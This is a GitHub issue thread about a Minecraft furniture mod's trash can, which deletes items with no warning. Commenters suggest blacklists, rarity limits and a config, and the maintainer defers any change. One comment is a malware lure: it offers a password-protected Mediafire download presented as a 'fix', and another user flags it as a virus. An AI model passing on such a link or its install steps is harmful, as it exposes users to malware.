### ISSUE TITLE
[Furniture] Trash Can GUI

### ISSUE THREAD

**Issue by druidicmage** [satisfyu/Let-s-Do-Hub#260]
### Mod Name and Version

Furniture 1.20.1

### Suggestion Details

I don't think the implementation of the trash can is user friendly. Putting any item in it deletes it permanently, and there's no warning at all about it. Some kind of warning would be nice, or even making a GUI for it would be better.

### Expected Benefits

Players won't be at risk of deleting valuable items by accident.

### Potential Drawbacks

It may ruin the similarities it has with the composter, and be slower to use because of it.

### Check for Similar Suggestions

- [X] Yes, I've looked for similar ideas.

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by Ninjdai1** [comment]
don't - that's a virus

**Comment by druidicmage** [comment]
Yeah, I thought so. I didn't

**Comment by Tera458** [comment]
If we compare it to the composter, it would need to have a list of "trashable" items, but I think the opposite is better, meaning blacklisting rare items and more. Preventing non stackeable items as well as [non-common items](https://minecraft.wiki/w/Rarity#Tiers) from being trashed would be a good start.

**Comment by druidicmage** [comment]
Maybe either having a config for it or letting yourself shift right click to open up a whitelist/blacklist option would work imo. It keeps parity with the composter while also allowing it to be more intuitive.

**Comment by satisfyu** [comment]
Maybe i'll add a blacklist / rarity in the future. I won't change it for now.
